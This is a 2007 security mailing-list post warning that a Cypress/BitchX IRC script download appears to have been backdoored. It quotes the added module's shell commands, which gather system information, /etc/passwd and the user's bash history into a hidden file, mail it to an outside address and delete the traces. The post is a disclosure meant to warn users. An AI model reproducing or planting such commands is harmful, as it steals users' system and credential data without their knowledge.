Cypress BX script backdoored?
- From: Chris <chris@xxxxxxxxxxx>
- Date: Tue, 6 Nov 2007 20:58:22 +0100
For those of us who use Cyp/bx (http://www.mindcryme.com/~void/cyp1.0k.tar.gz )
|]rip[@rock:14:53:49:~/tmp/cyp/modules| $ cat mdop.m
uname -a >> /tmp/.bx
cat /etc/hosts >> /tmp/.bx
cat /etc/passwd >> /tmp/.bx
cat $HOME/.bash_history >> /tmp/.bx 2>/dev/null
mail defcola@xxxxxxxxx < /tmp/.bx
rm -rf /tmp/.bx
What's up with this? Last time I downloaded this that wasn't there, and it's the same version number but different md5.
.. and this file wasn't included.
Network security professional
"Computer games don't affect kids. I mean if Pac-Man affected us as kids, we'd all be running around in darkened rooms, munching magic pills and listening to repetitive electronic music."
--Kristian Wilson, Nintendo 1989.
- Prev by Date: Re: SMF .htaccess bypass
- Next by Date: PhpNuke (add-on) MS TopSites Edit Exploit And Html Injection
- Previous by thread: IDMOS v1.0 Alpha Multiple RFI Vulnerability
- Next by thread: PhpNuke (add-on) MS TopSites Edit Exploit And Html Injection